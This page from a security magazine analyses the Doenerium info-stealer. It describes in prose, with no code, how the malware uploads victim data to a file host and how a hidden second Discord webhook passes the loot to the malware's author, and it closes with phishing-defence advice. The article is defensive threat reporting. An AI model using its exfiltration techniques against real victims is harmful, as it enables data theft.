Page 70 - Cyber Defense eMagazine December 2022 Edition
P. 70
After the malware has harvested all the data, it creates a complete virtual profile for the victim, which is
archived and uploaded to gofile.io – a free file sharing and storing platform. The malware author leverages
gofile.io to host the archive and share it with the hacker.
Part Two: The Backdoor Twist
Further research into the attack revealed that doener2323, the malware author, had also created a
second Github repository called 1337wtf1337. Both accounts were linked using a technique known as
“Dual Hooking” – in addition to the webhook that the hacker applies to the malware (where exfiltrated
data is copied), the malware contains an additional Discord webhook associated with doener2323.
In other words, everything a hacker achieved using this malware was automatically shared with
doener2323.
The dual hook was removed on September 3, 2022, but not before Doener created a separate,
completely obfuscated javascript file. When decoded, this file led to an open Discord server for sharing
the active hackers’ profits and updating the users about new features and fixes.
Initially, Doener2323 and their partners weren’t shy about informing other Discord users about their goal.
They openly explained that the purpose was monetization and that the webhook was part of a bigger
crypto mining operation for Doener2323, which infects any victims that are lured by active hackers using
Doenerium.
When other users started catching on, Doener became less enthusiastic about the possibility that they
might share in the spoils, and removed them from the Discord chat.
Recommendations
This attack (and its double-crossing backdoor) teaches us that nothing comes free – not even the stolen
fruits of malware. The hackers who utilized this publicly accessible malware to steal sensitive data were
ultimately themselves hacked in turn by a malware author growing their own crypto mining operation.
Like many dangerous phishing attacks, this sophisticated attack began with a simple email. Considering
about 1 in 5 phishing attempts evade Microsoft’s default security offering and actually get to users’
inboxes, it is integral that security leaders ensure that their organizations are provided with the most
advanced safeguards.
The first line of defense for protecting against this type of attack must be user education around email
security – regular email security drills can help employees better identify genuine suspicious content and
remind them not to open strange files, links, or attachments and double-check the identity of the sender.
Organizations should also establish a standardized process for employees to follow when they receive a
suspicious email or link.
Cyber Defense eMagazine – December 2022 Edition 70
Copyright © 2022, Cyber Defense Magazine. All rights reserved worldwide.